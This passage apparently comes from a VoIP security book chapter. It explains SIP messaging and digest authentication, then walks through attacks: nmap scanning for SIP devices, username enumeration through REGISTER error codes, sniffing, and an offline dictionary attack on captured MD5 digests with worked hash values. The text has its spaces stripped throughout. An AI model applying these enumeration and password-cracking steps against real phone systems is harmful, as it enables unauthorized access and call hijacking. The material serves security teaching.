SIPBasicsAtypicalSIPVoIPsolutionincludesfourparts:SIPUserAgents,Registrars,Redirectservers,andProxyservers.SIPusuallylistensonTCPorUDPport5060,butitcanbeconfiguredtoanyportdesired.Thefollowingisabriefoverviewoftheirfunctions.
UserAgent
AUserAgentisasoftphoneorhardphonewithSIPcallingcapabilities.TheUserAgentcaninitiatecallsandacceptcalls.
Registrar
TheRegistrarserverregistersUserAgentsonanetworkandcanbealsousedforauthenticatingthem.
Redirectserver
TheRedirectserveracceptsSIPrequestsandreturnstheaddressthatshouldbecontactedtocompletetheinitialrequest(inthecaseofmultiplelocationsforSIPUserAgents).
Proxyserver
TheProxyserverforwardstraffictoandfromUserAgentsandotherlocationsordevices.Proxyserversmayalsobeinvolvedinroutingandauthentication.BecauseVoIPprotocolsarenotveryfirewallfriendly,aProxyserverisoftenusedtocentralizeVoIPpacketsonanetwork.
TheSIPprotocol
TheSIPprotocolisbuiltsimilarlytotheHTTPprotocol,bothcontainingdifferentrequestmethodstoinvokespecificactions.ThefollowingisalistofSIPmethodsfromthecore
protocolandtheiractions.INVITETheINVITEmethodinvitesaVoIPUserAgenttoacall.AnINVITErequestissentbyoneUserAgenttoanotherUserAgenttoinitiateacall.INVITEstravelfromthesourceUserAgenttoanynumberofRegistrars,Redirectservers,andProxyservers,andthenontothedestinationUserAgent.REGISTERTheREGISTERrequestregistersaSIPUserAgentwithaRegistrar.TheREGISTERrequestissentbyaUserAgenttoaRegistrarforthedomain,andtheRegistrarserverregistersalltheUserAgentswithinaspecificdomain.ItisalsousedwithProxyserverstoroutecallstoandfromUserAgents.ACKAnACK(acknowledge)messageissentfromoneUserAgenttoanotherinordertoconfirmreceiptofamessage.TheACKisusuallythethirdpartofathree-partprocess,indicatingthatthehandshakeiscompletedbetweentwoUserAgentsandthemediaportionofthecallcanbegin.CANCELTheCANCELmethodcancelsanexistingINVITEmessage.AUserAgentcansendaCANCELrequesttoterminateapreviousvalidrequest.BYETheBYEmethodhangsupanexistingVoIPcallorsession.TheBYEmethodisusedtoterminateaspecificsession.OPTIONSTheOPTIONSmethodisusedtolistthecapabilitiesandsupportedmethodsofaUserAgentorProxyserver.AswithHTTP,whenOPTIONSissentfromaUserAgenttoaProxyserver,theProxyservercanrespondwithalistofmethodsitsupports.
SIPMessagesASIPmessageusuallycontainsafewmoreitems,includingthefollowing:
ToFieldTherecipientoftheoriginalSIPmessageFromFieldThesenderoftheSIPmessageContactFieldTheIPaddressoftheSIPUserAgentCall-IDFieldAnumberthatuniquelyidentifiesagivencallbetweentwoUserAgents;allSIPmessagesthatbelongtoasinglecommunicationstream(asinglephonecall)usethesameCall-IDsothatthepacketswillbegroupedcorrectlyCSeqFieldSequencenumberofSIPmessages;asequencenumberisavaluethatshowstheorderofpacketswhenseveralpacketsaresentbetweenentities,anditusuallyincrementsbyoneContent-TypeFieldTheMIMEtypeforthepayload,suchasapplication/sdp
Content-LengthFieldThesizeofthepayloadinthepacketWhileSIPprovidesclearandstraightforwardmethodstocommunicatefromaUserAgenttoaRegistrar,Redirectserver,Proxyserver,oranotherUserAgent,itlacksamethodofstrongauthenticationorauthorization.ThislackofstrongsecuritycanallowattackerstoabuseSIPonVoIPnetworks.VoIPnetworksusingSIPidentifyuserswithidentifiersthatarenomoresecurethananemailaddressorawebURL.Specifically,SIPURIs(UniformResourceIdentifiers)identifyaSIPUserAgentintheformofSIP:user@domain,SIP:user@domain:port(ifthereisnoportlisted,itdefaultsto5060),orSIP:user@IPaddress.Forexample,ifSoniabelongstotheAum.comdomainandKusumbelongstotheOm.comdomain,theiridentitieswouldbeSIP:Sonia@Aum.comandSIP:Kusum@Om.com.WhenSoniacallsKusumoveraSIP-enabledVoIPnetwork,DNSserversareusedtoroutethecallappropriately(usuallyviaProxyservers).However,IPaddressescanbeusedinplaceofthedomain
MakingaVoIPCallwithSIPMethodsNowthatwe'vebrieflycoveredSIPmethods,let'swalkthroughanexampleofaVoIPcallusingthemethods.ThefollowingstepshighlightasampleVoIPcallusingSIP.Thecallinvolvestwousers,theirUserAgents(SoniaandKusum),andtheirrequiredintermediatesystems.Figure2-1illustratesthestep-by-stepprocess.
Figure2-1.SampleVoIPcallusingSIP
Registration
First,SIPUserAgentSoniaregisters withtheRegistrarinitsdomain(Aum.com),andSIPUserAgentKusumregisters withtheRegistrarinitsdomain(Om.com).Ifauthenticationhasbeenenabled,itoccursduringtheREGISTERorINVITEsteps,asshownhere:
REGISTERsip:Sonia@Aum.comSIP/2.0Via:SIP/2.0/UDP192.168.5.122:5060From:Sonia<sip:Sonia@Aum.com>To:Sonia<sip:Sonia@Aum.com>;tag=110806Call-ID:1108200600
CSeq:1REGISTERContact:<sip:Sonia@192.168.5.122>EXPIRES:3600Content-Length:0
REGISTERsip:Kusum@Om.comSIP/2.0Via:SIP/2.0/UDP172.16.11.17:5060From:Kusum<sip:Kusum@Om.com>To:Kusum<sip:Kusum@Om.com>;tag=111706Call-ID:1976111700CSeq:1REGISTERContact:<sip:Kusum@172.16.11.17>EXPIRES:3600Content-Length:0
TheINVITERequest
SoniawishestomakeaphonecalltoKusum.
1. Sonia'sUserAgentsendsanINVITErequest totheSIPProxyserverfromSonia@Aum.comtoKusum@Om.com.
INVITEsip:Kusum@Om.comSIP/2.0Via:SIP/2.0/UDP192.168.5.122:5060From:Sonia<sip:Sonia@Aum.com>;tag=110806To:Kusum<sip:Kusum@Om.com>Call-ID:2006110800CSeq:1INVITEContact:<sip:Sonia@192.168.5.122>Content-Type:application/sdpContent-Length:141
2. TheProxyserverinSonia'snetworkperformsaDNSlookupforOm.com.AfterthelookupiscompleteandOm.comislocated,Sonia'sProxyserversendstheINVITErequesttotheProxyserverinKusum'snetwork.
3. TheProxyserverintheOm.comnetworkperformsalookupforKusum'slocation.TheSIPRegistrarrespondstothelookupwithKusum'saddresslocation.TheProxyserverinKusum'snetworksendsa100Tryingmessage toSonia
toindicatethattheINVITErequesthasbeenreceivedbutnotyetsenttoKusum.
4. TheProxyserverinKusum'snetworkforwardstherequesttoKusum.
5. Kusum'sUserAgentreadstherequest.SIP/2.0100Trying
From:Sonia<sip:Sonia@Aum.com>;tag=110806To:Kusum<sip:Kusum@Om.com>Call-ID:2006110800CSeq:1INVITEContent-Length:0
6. Kusum'sUserAgentsendsa180Ringingmessage toSonia,indicatingthattheremotetelephoneisringing.
SIP/2.0180Ringing
From:Sonia<sip:Sonia@Aum.com>;tag=110806To:Kusum<sip:Kusum@Om.com>Call-ID:2006110800CSeq:1INVITEContentLength:0
7. OnceKusumanswersthephone,herUserAgentsendsa200OK toSonia(assumingshewantstoproceedwiththephonecall).
SIP/2.0200OK
From:Sonia<sip:Sonia@Aum.com>;tag=110806To:Kusum<sip:Kusum@Om.com>Call-ID:2006110800CSeq:1INVITEContact:<sip:Kusum@172.16.11.17>Content-Type:application/sdpContent-Length:140
8. Afterreceivingthe200OKmessage,SoniasendsACK toKusum,acknowledgingthatshereceivedthe200OKmessageandthattheycanproceedwiththeVoIPcall.
ACKsip:Kusum@Om.comSIP/2.0Via:SIP/2.0/UDP192.168.5.120:5060
Route:<sip:Kusum@192.186.5.120>From:Sonia<sip:Sonia@Aum.com>;tag=110806To:Kusum<sip:Kusum@Om.com>;tag=1117706Call-ID:2006110800CSeq:1ACK
Content-Length:0
9. RTPpacketsarethenexchanged(onthemedialayer,notthesessionlayer).RTPistheprotocolthatactuallytransferstheaudio(media)foreachphone,butSIPisusedtosetupthesession.BothprotocolsworktogetherfortheentireVoIPsession.(RTPisdiscussedindetailinChapter4.)
10. Oncethephonecalliscomplete,SoniacanterminatethecallbysendingaBYEmessage toKusum.
BYEsip:Kusum@Om.comSIP/2.0Via:SIP/2.0/UDP10.20.30.41:5060To:Kusum<sip:Kusum@Om.com>;tag=1117706From:Sonia<sip:Sonia@Aum.com>;tag=110806Call-ID:2006110800CSeq:1BYE
Content-Length:0
11. KusumacceptstheterminatedcallandsendsanOKmessage toSonia.
SIP/2.0200OK
To:Kusum<sip:Kusum@Om.com>;tag=1117706From:Sonia<sip:Sonia@Aum.com>;tag=110806Call-ID:2006110800CSeq:1BYEContent-Length:0
EnumerationandRegistrationNetworkportscannerscanbeusedtoenumerateSIPUserAgents,Registrars,Proxyservers,andotherSIP-enabledsystems.SIPusuallylistensonTCPorUDPport5060.
Note✎
OtherprotocolsrequiredforVoIPcalls,suchasRTP,listenonstatic/dynamicportsotherthanport5060.Whileport5060isusedtosetupthesessionusingSIP,theactualmediatransmissionusesotherports.
EnumeratingSIPDevicesonaNetwork
Here'showtoenumerateSIPdevicesonanetwork,stepbystep:
1. DownloadNmapfromhttp://insecure.org/nmap/.2. Enternmaponthecommandline(Windows)orshell(Unix)
toretrievethesyntaxofthetool.3. Enterthefollowingnmapcommandonthecommand
line/shelltoenumerateSIPUserAgentsandotherintermediatedevices.
nmap.exe-sU-p5060IPAddressRange
4. Or,foraclassBnetworkaddressrangeona172.16.0.0network,enter:
nmap.exe-sU-p5060172.16.0.0/16
5. EachIPaddressthatshowsopenfortheSTATE(asshowninFigure2-2)isprobablyaSIPdevice.AsyoucanseeinFigure2-2,theaddresses172.16.1.109and172.16.1.244areprobablySIPdevices.
Figure2-2.EnumeratingSIPentities
RegisteringwithIdentifiedSIPDevices
OnceSIPdeviceshavebeenidentifiedonthenetwork,onecanattempttoregisterwiththemusingaSIPUserAgent.Additionally,becauseauthenticationisoftendisabledorenabledusingweakpasswords,suchasthetelephonenumberofthephone,thisprocesscanberathereasy.(I'lldiscussbreakingauthenticationlaterinthischapter.)OnceaSIPUserAgentregisterswithaRegistrar,allavailableSIPinformationonthenetwork,suchasotherSIPUserAgents,canbeenumerated.Ifauthenticationhasbeendisabledonthedevice,anonymousunauthorizedusersmaybeabletofindallSIPentitiesonthenetwork.ThisinformationcanbeusedtotargetspecificphonesontheVoIPnetwork.CompletethefollowingexercisetoregisteraSIPUserAgentwithaSIPRegistrar.
1. Download,install,andrunaSIPUserAgent,suchasX-Litefromhttp://www.xten.com/index.php?menu=download/.
2. Download,install,andrunaPBXserverrunningSIP,suchasAsterisk.Youcandownloadapre-configuredversionofAsteriskfromhttp://www.vmware.com/vmtn/appliances/directory/302/thatrunsunderVMwarePlayer.
3. Downloadthepre-configuredSIP.conffilefromhttp://labs.isecpartners.com/HackingVoIP/HackingVoIP.html/
4. Copysip.confto/etc/asteriskontheVoIPVMwareappliance.5. StartX-Liteandright-clickitsmaininterface.6. SelectSIPAccountSettings.7. SelectAddandenterthefollowinginformationforeach
field:a. Username:Soniab. Password:HackmeAmadeusc. Domain:IPaddressoftheVoIPonCDVMwareappliance
8. CheckRegisterwithdomainandreceiveincomingcalls.9. SelecttheTargetDomainradiobutton.
10. SelectOKandClose.
You'redone!YouhavenowregisteredtoaSIPserverusingtheSIPUserAgent.
Authentication
SIPusesdigestauthenticationforuservalidation,whichisachallenge/responsemethod.[1]TheauthenticationprocessislargelybasedonHTTPdigestauthentication,withafewminortweaks.WhenUserAgentssubmitaSIPREGISTERorINVITEmethod
toaserverthatrequiresauthentication,a401or407errormessageisautomaticallysentbytheserver,indicatingthatauthenticationisrequired.Withinthe401or407response,therewillbeachallenge(nonce).ThechallengeisusedinthedigestauthenticationprocessthatwilleventuallybesubmittedbytheUserAgent.Specifically,theUserAgentmustincludethefollowingentitiesinitsresponse:
UsernameTheusernameusedbytheSIPUserAgent(e.g.,Sonia)RealmTheassociateddomainforthesession(e.g.,isecpartners.com)PasswordThepasswordusedbytheSIPUserAgent(e.g.,HackmeAmadeus)MethodSIPmethodusedduringthesession,suchasINVITEandREGISTERURITheUniformResourceIdentifierfortheUserAgent,suchasSIP:192.168.2.102Challenge(nonce)Theuniquechallengeprovidedbytheserverinthe401or407responseCnonceTheclientnonce.Thisvalueisoptional,unlessQualityofServiceinformationissentbytheserver,andusuallythevalueisabsent.NonceCount(nc)Thenumberoftimesaclienthassentanoncevalue;thisvalueisoptionalandisusuallyabsent.
ThefollowingstepsoutlinetheprocessofaSIPUserAgent'sauthenticatingtoaSIPserverusingdigestauthentication:
1. ASIPUserAgentsendsarequestforcommunication(viaaREGISTER,INVITE,orsomeotherSIPmethod).
2. Theserver(e.g.,RegistrarorSIPProxyserver)respondswitheithera401or407unauthorizedresponse,whichcontainsthechallenge(nonce)tobeusedfortheauthenticationprocess.
3. TheSIPUserAgentperformsthreeactionsinordertosendthecorrectMD5responsebacktotheserver,whichwillprovethatithasthecorrectpassword.Thefirststepisto
createahashconsistingofitsusername,realm,andpasswordinformation,accordingtothefollowingsyntax:
MD5(Username:Realm:Password)
4. Forthesecondaction,theUserAgentcreatesasecondMD5hashconsistingoftheSIPmethodbeingused,suchasREGISTER,andtheURI,suchasSIP:192.168.2.102,accordingtothefollowingsyntax:
MD5(Method:URI)
5. Forthelastaction,theSIPUserAgentcreatesanMD5hashtobeusedforthefinalresponse.ThishashcombinesthefirstMD5hashinstep3,thechallenge(nonce)fromtheserverfromthe401/407packet,thenoncecount(ifonehasbeensent),cnonce(ifonehasbeensent),andthesecondMD5hashfromstep4,asfollows:
MD5(MD5-step-3:nonce:nc:cnonce:MD5-step-4)
Thencandcnonceareoptional,sotheequationcouldalsobe:
MD5(MD5-step-3:nonce:MD5-step-4)
6. TheclientsendsthefinalMD5hashcreatedinstep5totheserverasits"response"value.
7. Theserverperformsthesameexerciseastheuserdidinsteps3,4,and5.IftheresponsefromtheUserAgentmatchestheMD5hashvaluecreatedbytheserver,theservercanthenconfirmthatthepasswordiscorrect,andtheuserwillbeauthenticated.
AnexampleauthenticationprocessbetweenaSIPUserAgentandaSIPserverisshowninFiguresFigure2-3(adigestchallengefromtheSIPserver)andFigure2-4(theauthenticationresponsefromtheSIPUserAgent).
Figure2-3.DigestchallengefromSIPserver
Figure2-4.AuthenticationresponsefromSIPUserAgent
NoticeinFigure2-3thatthechallenge(nonce)valueis350c0fecandthattherealmisisecpartners.com.InFigure2-4theusernameisSonia,andtheURIisSIP:192.168.2.102.Basedonthisinformation,andaccordingtosteps1through7,theresponsecalculatedbytheUserAgentwouldbe:
1.MD5(Sonia:isecpartners.com:HackmeAmadeus)=49be40838a87b1cb0731e35c41c06e042.MD5(REGISTER:sip:192.168.2.102)=92102b6a8c0f764eeb1f97cbe6e67f213.MD5(49be40838a87b1cb0731e35c41c06e04:350c0fec:92102b6a8c0f764eeb1f97cbe6e67f21)=717c51dadcad97100d8e36201ff11147(FinalResponseValue)
Encryption
Likemanyotherprotocols,SIPdoesnotofferencryptionnatively.However,it'simportanttouseencryptionatthesignalinglayerinordertoprotectsensitiveinformationtraversingthenetwork,suchaspasswordsandsequencenumbers.SimilartotheHTTPprotocol,TLS(TransportLayerSecurity,successortoSSLv3)canbeusedtosecureSIP.TLScanprovideconfidentialityandintegrityprotectionforSIP,protectingitagainstmanyofthesecurityattacksdiscussedlaterinthischapter.Inthefollowingsection,wewilldiscusshowTLSandS/MIMEcanbeusedtosecureSIP;however,asofthiswriting,theimplementationisnotwidelysupported.
SIPwithTLS
UsingTLSwithSIP(SIPS)isquitesimilartousingTLSonHTTP(HTTPS).Here'showitworks:
1. AUserAgentsendsamessagetoaserverandrequestsaTLSsession.
2. TheserverrespondstotheUserAgentwithapubliccertificate.
3. TheUserAgentverifiesthevalidityofthecertificate.4. TheserverandUserAgentexchangesessionkeystobe
usedforencryptinganddecryptinginformationsentalongthesecurechannel.
5. Atthispoint,theservercontactsthenexthopalongtheroutefortheSIPUserAgenttoensurethatcommunicationfromhop2tohop3(andsoforth)isalsoencrypted,whichensureshop-to-hopencryptionbetweentheSIPUserAgentsandallintermediateserversanddevices.
Figure2-5illustratesaVoIPcallusingSIPwithTLSsecurity.
Figure2-5.SampleSIPcommunicationwithTLS
Here'swhat'shappeninginFigure2-5:
1. SIPUserAgentrequestsTLSsecuritywiththeSIPProxyservernumber1.
2. SIPProxyserver1sendsitspubliccertificatetotheSIP
UserAgent.3. SIPUserAgentverifiesthevalidityofthecertificate.4. SIPProxyserver1andSIPUserAgentexchangesession
keys,enablingencryptionbetweenthem.5. SIPProxyserver1contactsSIPProxyserver2toencrypt
hopnumber2.6. Steps1through4arerepeatedbetweenbothProxy
servers.7. Step5isrepeatedbetweeneachhopontherequested
communicationchannel.
SIPwithS/MIME
InadditiontoTLS,S/MIME(SecureMultipurposeInternetMailExchange)canalsobeusedforsecuringthebodiesofSIPmessages.S/MIMEcanprovideintegrityandconfidentialityprotectiontoSIPcommunication;however,itisconsiderablymoredifficulttoimplementthanTLS.BecauseSIPmessagescarryMIMEbodies(audio),S/MIMEcanbeusedtosecureallcontentofmessagessenttoandfromanotherUserAgent.SIPheaders,however,remainintheclear.InordertodeployS/MIME,eachUserAgentmustcontainanidentifyingcertificatewithpublicandprivatekeys,whichareusedtosignand/orencryptmessageinformationinSIPpackets.Forexample,ifuserSoniawantstosendaSIPpacketwithS/MIMEtouserKusum,shewouldencryptthebodyoftheSIPpacketwithKusum'spublickey.BothSoniaandKusummustalsohaveakeyringthatcontainseachother'scertificatesandpublickeysinorderforeachtoreadtheencryptedmessage.ThisimplementationissimilartoPrettyGoodPrivacy(PGP),whereinasenderencryptsamessagewiththereceiver'spublickey.Becausethereceiver'sprivatekeyistheonlykeythatcanbeusedtoretrieveinformationencryptedwiththereceiver's
publickey,dataissafedespitetheuseofpublicnetworksfortransfer.Therefore,usersareoftenforcedtouseself-signedcertificatesthatofferverylittleprotectionbecausetheycaneasilybefaked.WhileitispossibletodistributecertificateswithintheSIPpacketitself,withoutacentralauthoritythereisnotagoodmethodforaUserAgenttoverifythatthecertificatereceivedisactuallyassociatedwiththesenderoftheSIPpacket.
[1]SeeSection22.4intheSIPRFC3261fordigestauthenticationinformation.
SIPSecurityAttacksNowthatweknowthebasicsofSIPauthenticationandencryption,let'sdiscusssomeofthesecurityattacks.ItisnosecretthatSIPhasseveralsecurityvulnerabilities;somearedocumentedintheRFCitself,andasimplewebsearchforVoIPsecurityissuewillreturnseveralhitsthatinvolveSIPsecurityweaknesses.WhileanentirebookcouldbedevotedtoSIPsecurityattacks,we'llfocusonVoIPattacksondevicesusingSIPforthesessionsetup.We'llcoverafewofthemorepopularattacksinthemostcriticalattackclasses,namely:
UsernameenumerationSIPpasswordcracking(dictionaryattack)Man-in-the-middleattackRegistrationhijackingSpoofingRegistrarsandProxyserversDenialofService,including
BYEREGISTERun-register
UsernameEnumeration
UsernameenumerationinvolvesgaininginformationaboutvalidaccountsregisteredontheVoIPnetworkbyusingerrormessagesfromSIPProxyserversandRegistrarsorbysniffing.Similartoanysecurityattack,informationleakageisoftenthefirst80percentoftheprocess.Themoreinformationleakedbyatarget,themorelikelyanattackeristosucceed.Therefore,enumeratingusernamesisoftenthefirststepofanattack.
EnumeratingSIPUsernameswithErrorMessages
SIPusernamescanbeenumeratedviaerrormessagessentbySIPProxyserversand/orRegistrars.IfaUserAgentsendsaREGISTERorINVITErequestwithavalidusername,a401responseisreceived.However,ifaREGISTERorINVITErequestissentwithaninvalidusername,a403responseisreceived.Anattackercansimplybrute-forcetheprocessbysendingouthundredsofREGISTERpacketswithdifferentusernamevalues.Foreachrequestthatrespondswitha401value,theattackerwillknowthatheorshehasuncoveredavalidusername.CompletethefollowingstepstoenumerateSIPusernamesviaanerrormessageresponse:
1. DownloadandinstallSiVuSfromhttp://www.vopsecurity.org/.
2. UndertheSIPtab,selectUtilities►MessageGenerator.3. Itemsathroughjinthefollowinglistshouldbeentered
intotheSiVusSIPMessageGeneratortab.IntheSIPMessagesectionofSiVuS,enterthecorrectvaluesforthelocalVoIPnetwork,whereDomainwouldbetheProxyserverorRegistrar.Forexample,itemsinitalicshouldbecustomizedtothespecificlocalenvironment.Inordertoenumerateusernames,changetheusernameinstepcbelowtotheusernameyouwishtoenumerate.OurfirstrequestwilltrytodetermineiftheusernameSoniaexistsonthe192.168.2.102domain.a. Method:REGISTERb. Transport:UDPc. CalledUser:Soniad. Domain:192.168.2.102e. Via:SIP/2.0/TCP192.168.5.102
f. To:Sonia<sip:Sonia@192.168.2.102>g. From:Attacker<sip:Attacker@192.168.2.102>h. FromTag:ff761a48i. Call-ID:
845b1f52dd197838MThmMDVhZWRkYZIxMmI1MjNiNDA4MThmYTJiODdiMzM
j. Cseq:1REGISTER
IftheSIPProxyserverorRegistrarreturnsa401responsepacket,theuserSoniahasjustbeenenumerated.Ifnot,theuserSoniaisnotusedonthisVoIPnetwork.
EnumeratingSIPUsernamesbySniffingtheNetwork
WhenauthenticationisrequiredbetweenaUserAgentandSIPserver,theURIissentfromtheUserAgenttotheserver.UnlesssomesortoftransportencryptionhasbeenusedbetweentheUserAgentandtheauthenticatingserver,suchasTLS,theURItraversesthenetworkincleartext.Hence,theURIstandardofSIP:User@hostname:portcansimplybesniffedbyanattackeronthenetwork.
Warning☠
AswitchednetworkprovideslittleprotectionasanattackercanperformanARPpoisoningman-in-the-middleattackandcapturealltheSIPURIswithinthelocalsubnet.
Theuseofcleartextusernamesplacesmorepressureonthesecurityoftheclient'spassword,becausetheusernameisgivenawayfreely.Furthermore,amalicioususercanattemptseveralattacksoncetheusernameiscaptured,suchasabrute-forceattack.Additionally,becauseenterprisesoftenuseusernamesorphoneextensionsaspasswords,ifanattackercaneasilyobtainausernameorphoneextension,theUserAgentcouldbeeasilycompromised.
Figure2-6showsanexampleofasniffedusernameoverthenetworkusingWireshark.InordertoviewtheSIPusernameinWireshark,onewouldsimplynavigatetotheSIPsectionofthepacket,expandtheMessageHeadersection,andviewtheTo,From,andContactfields.ThesefieldsshowtheUserAgent'susernameincleartext.
Note✎
Anothertool,calledCain&Abel,canalsobeusedtoenumerateusernames,asshownlaterinthechapter.
Figure2-6.SIPusernameinWireshark
SIPPasswordRetrieval
NowthatweknowhowtoeasilyretrievetheusernameofSIPUserAgents,let'sattempttogetthepassword.SIP'sauthenticationprocessusesdigestauthentication.Asdiscussedin"SIPBasics"onSIPBasics,thismodelensuresthatthepasswordisnotsentincleartext;however,themodelisnotimmunetobasicofflinedictionaryattacks.TheSIPUserAgentusesthefollowingequationstocreatetheMD5responsevalueusedtoauthenticatetheendpointtotheserver(itemsinitalictraversethenetworkincleartext).Noticethattheonlyitemthatisnotexposedtoapassiveanonymousmachineonthenetworkisthepassword,whichmeansthatitisvulnerabletoanofflinedictionaryattack.Adictionaryattackconsistsofsubmittingadictionaryofwordsagainstagiven
hashalgorithmtodeducethecorrectpassword.Anofflineversionofthedictionaryattackisperformedoffthesystem,suchasonanattacker'slaptop:
MD5-1=MD5(Username:Realm:Password)MD5-2=MD5(Method:URI)ResponseMD5Value=MD5(MD5-1:Nonce:MD5-2)
Inordertoperformanofflinedictionaryattack,theattackermustfirstsnifftheusername,realm,method,URI,nonce,andtheMD5Responsehashoverthenetwork(usingaman-in-the-middleattackontheentiresubnet),whichareallavailableincleartext.Oncethisinformationisobtained,theattackertakesadictionarylistofpasswordsandinsertseachoneintotheaboveequation,alongwithalltheotheritemsthathavealreadybeencaptured.Oncethisoccurs,theattackerwillhavealltheinformationtoperformtheofflinedictionaryattack.Furthermore,becauseSIPUserAgentsoftenusesimplepasswords,suchasafour-digitphoneextension,thetimerequiredtogainthepasswordcanbeminimal.
DataCollectionforSIPAuthenticationAttacks
Theinformationneededtoperformanofflinedictionaryattackisavailabletoapassiveattackerfromtwopacketsbysniffingthenetwork,includingthechallengepacketfromtheSIPserverandtheresponsepacketsentbytheUserAgent.ThepacketsentfromtheSIPservercontainsthechallengeandrealmincleartext.ThepacketfromtheUserAgentcontainstheusername,method,andURIincleartext.Oncetheattackerhassniffedallthevaluestocreatethepassword,shetakesapasswordfromherdictionaryandconcatenatesitwiththeknownusernameandrealmvaluestocreatethefirstMD5hashvalue.Next,shetakesthemethodandURIsniffedoverthenetworktocreatethesecondMD5hashvalue.Oncethetwohashesaregenerated,sheconcatenatesthefirstMD5,thenoncesniffedoverthenetwork,andthesecondMD5hashvaluetocreatethefinal
responseMD5value.IftheresultingMD5hashvaluematchestheresponseMD5hashvaluesniffedoverthenetwork,theattackerknowsthatshehasguessed(brute-forced)thecorrectpassword.IftheMD5hashvaluesarenotcorrect,sherepeatstheprocesswithanewpasswordfromherdictionaryuntilshereceivesahashvaluethatmatchesthehashvaluecapturedoverthenetwork.
Note✎
Unlikeanonlinebrute-forceattackwheretheattackermayhaveonlythreeattemptsbeforesheislockedoutornoticedonthenetwork,theattackercanperformthistestofflineindefinitelyuntilshehascrackedthepassword.Furthermore,forSIPhardphonesandsoftphoneswitheasyorbasicpasswords,theexercisewillnottakeverylong.
AnExample
Let'swalkthroughanexample.Figure2-3showsthechallengepacketfromaSIPserver.Fromthispacket,anattackercanobtainthefollowinginformation:
Challenge(nonce):350c0fecRealm:isecpartners.com
TheresponsepacketfromaSIPUserAgentisshowninFigure2-4.Fromthispacket,anattackercanobtainthefollowinginformation:
Username:SoniaMethod:REGISTERURI:SIP:192.168.2.102MD5ResponseHashValue:717c51dadcad97100d8e36201ff11147
Usingthedigestauthenticationequationoutlinedpreviously,
Usingthedigestauthenticationequationoutlinedpreviously,andboldingallitemswehavesniffedoverthenetwork,ourequationswouldnowlooklike:
SetupEquation1MD5-1:MD5(Sonia:isecpartners.com:Password)SetupEquation2MD5-2:MD5(REGISTER:sip:192.168.2.102)FinalEquation3717c51dadcad97100d8e36201ff11147:(MD5-1:350c0fec:MD5-2)
Equation1isunknown,becausethepasswordisnotsentoverthenetworkincleartext.Equation2iscompletelyknown,becausethemethodandURIareincleartext.TheMD5hashvalueforEquation2turnsouttobe92102b6a8c0f764eeb1f97cbe6e67f21.Equation3isthecombinationoftheMD5hashvaluefromEquation1,thenoncefromtheSIPserver,andtheMD5hashvaluefromEquation2.BecausethenoncefromtheSIPserverhasbeensniffedoverthenetworkandtheMD5hashvalueofEquation2canbegenerated,theMD5hashvaluefromEquation1istheonlyunknownentitytobrute-force.Toperformthedictionaryattack,twoproceduresareneeded.ThefirstprocedurewillrequiretheattackertotakeEquation1andinsertdictionarywordsinthepasswordfield,asshowninboldinthefollowingexample:
MD5-1:MD5(Sonia:isecpartners.com:Password)f3ef32953eb0a515ee00916978a04eac:MD5(Sonia:isecpartners.com:Hello)44032ae134b07cee2e519f6518532bea:MD5(Sonia:isecpartners.com:My)08e07c4feffe79e208a68315e9050fe4:MD5(Sonia:isecpartners.com:Voice)b7e9d8301b12a8c30f8cab6ed32bd0b6:MD5(Sonia:isecpartners.com:Is)44032ae134b07cee2e519f6518532bea:MD5(Sonia:isecpartners.com:My)56a88ae72cff2c503841006d63a5ee98:MD5(Sonia:isecpartners.com:Passport)7b925e7f71e32e0e8301898da182c944:MD5(Sonia:isecpartners.com:Verify)a5d8761336f52fc74922753989f579c4:MD5(Sonia:isecpartners.com:Me)49be40838a87b1cb0731e35c41c06e04:MD5(Sonia:isecpartners.com:HackmeAmadeus)
BasedontheseMD5hashvaluesfromEquation1,theMD5hashfromEquation2(92102b6a8c0f764eeb1f97cbe6e67f21),andthenoncevaluefromEquation3(350c0fec),theattackercannowexecutethesecondprocedure,whichisbrute-forcingEquation3shownearlier.Noticethatweareinsertinga
differentMD5-1value,whichisgeneratedfromeachuniquepasswordwearetryingtobrute-force,butkeepingthesamenonceandMD5-2valuesinthefollowingequation:
MD5=(MD5-1:72fbe97f:MD5-2)bba91fc34976257bb5aa47aeca831e8e=(f3ef32953eb0a515ee00916978a04eac:350c0fec:92102b6a8c0f764eeb1f97cbe6e67f21)
01d0e5f7c084cbf9e028758280ffc587=(44032ae134b07cee2e519f6518532bea:350c0fec:92102b6a8c0f764eeb1f97cbe6e67f21)
5619e7d8716de9c970e4f24301b2d88e=(08e07c4feffe79e208a68315e9050fe4:350c0fec:92102b6a8c0f764eeb1f97cbe6e67f21)
8672c6c38c335ef8c80e7ae45b5122f8=(b7e9d8301b12a8c30f8cab6ed32bd0b6:350c0fec:92102b6a8c0f764eeb1f97cbe6e67f21)
01d0e5f7c084cbf9e028758280ffc587=(44032ae134b07cee2e519f6518532bea:350c0fec:92102b6a8c0f764eeb1f97cbe6e67f21)
913408579b0beb3b6a70e7cc2b8688f9=(56a88ae72cff2c503841006d63a5ee98:350c0fec:92102b6a8c0f764eeb1f97cbe6e67f21)
b8178e3e6643f9ff7fc8db2027524494=(7b925e7f71e32e0e8301898da182c944:350c0fec:92102b6a8c0f764eeb1f97cbe6e67f21)
c4ee4ed95758d5e6f6603c26665f4632=(a5d8761336f52fc74922753989f579c4:350c0fec:92102b6a8c0f764eeb1f97cbe6e67f21)
717c51dadcad97100d8e36201ff11147=(49be40838a87b1cb0731e35c41c06e04:350c0fec:92102b6a8c0f764eeb1f97cbe6e67f21)
ThefinalpasswordattemptinthepreviousexampleyieldsanMD5hashvalueof717c51dadcad97100d8e36201ff11147,whichisthesameMD5hashvaluetheattackersniffedoverthenetwork(showninthesecondtolastlineinFigure2-4).ThistellstheattackerthatthewordHackMeAmadeusistheSIPUserAgent'spassword!
ToolstoPerformtheAttack
Thisattackamplifiestheimportanceofastrongpassword—ideally,onethatcannotbebrute-forcedeasilywhenusingdigestauthentication.Ihavewrittenatoolthatcanperformthispreviousexerciseautomatically(alongwithacapturedSIP
authenticationsessionfromWiresharkoryourfavoritesniffer).Thetooltakesalistofpasswordsthatanenduserwouldliketotest,concatenatesitwiththerequiredinformationsniffedtheoverthenetwork(fromWireshark),anddeterminesiftheresultingMD5hashvaluematchesthehashvaluethatwasalsosniffedoverthenetwork.Foracopyofthetool,calledSIP.Tastic.exe,visithttp://www.isecpartners.com/tools.html/.AscreenshotofthetoolisinFigure2-7.
Figure2-7.SIPpasswordtesting
